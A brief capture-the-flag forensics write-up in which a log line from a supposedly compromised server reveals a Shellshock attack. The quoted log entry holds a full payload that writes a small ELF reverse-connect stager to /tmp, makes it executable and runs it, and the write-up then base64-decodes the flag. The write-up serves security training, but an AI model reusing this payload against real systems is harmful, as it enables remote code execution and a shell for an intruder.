ForensicsLG05: Urgent Escalation


Ok, urgent work for you, agent - this case just got escalated up through the ranks. As you've been looking into it again I decided to get a couple of other agents to take a look as well and they've noticed something of serious concern - we believe one of the servers in our Brazilian office which we were using to conduct the initial investigation has been compromised by exploiting a potential vulnerability. Can you identify it from the log files?

Tip: Find the vulnerability to get the flag.

This challenge had a free hint: CWould you expect to see Linux commands being passed as a URL string?

You had to dig through the entire log and hope you notice the different part

 "GET /usr/lib/cgi-bin/basic.sh HTTP/1.1" 404 461 "-" "() { :;};echo -e \"\\r\\nU2gzbGxfU2gwY2tlZF9ieV9TMW1wbDFjMXR5IQo=$(echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x03\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x54\\\\x80\\\\x04\\\\x08\\\\x34\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x34\\\\x00\\\\x20\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x04\\\\x08\\\\x00\\\\x80\\\\x04\\\\x08\\\\xcf\\\\x00\\\\x00\\\\x00\\\\x4a\\\\x01\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x6a\\\\x0a\\\\x5e\\\\x31\\\\xdb\\\\xf7\\\\xe3\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x02\\\\xb0\\\\x66\\\\x89\\\\xe1\\\\xcd\\\\x80\\\\x97\\\\x5b\\\\x68\\\\xc0\\\\xa8\\\\x1d\\\\x88\\\\x68\\\\x02\\\\x00\\\\x11\\\\x5c\\\\x89\\\\xe1\\\\x6a\\\\x66\\\\x58\\\\x50\\\\x51\\\\x57\\\\x89\\\\xe1\\\\x43\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\x19\\\\x4e\\\\x74\\\\x3d\\\\x68\\\\xa2\\\\x00\\\\x00\\\\x00\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x89\\\\xe3\\\\x31\\\\xc9\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\xbd\\\\xeb\\\\x27\\\\xb2\\\\x07\\\\xb9\\\\x00\\\\x10\\\\x00\\\\x00\\\\x89\\\\xe3\\\\xc1\\\\xeb\\\\x0c\\\\xc1\\\\xe3\\\\x0c\\\\xb0\\\\x7d\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x10\\\\x5b\\\\x89\\\\xe1\\\\x99\\\\xb6\\\\x0c\\\\xb0\\\\x03\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x02\\\\xff\\\\xe1\\\\xb8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xbb\\\\x01\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80>>/tmp/dJWhq ; /bin/chmod 777 /tmp/dJWhq ; /tmp/dJWhq)U2gzbGxfU2gwY2tlZF9ieV9TMW1wbDFjMXR5IQo=\""

U2gzbGxfU2gwY2tlZF9ieV9TMW1wbDFjMXR5IQo=

Run it through Cyberchef, Base64: Sh3ll_Sh0cked_by_S1mpl1c1ty!

Flag: Sh3ll_Sh0cked_by_S1mpl1c1ty!

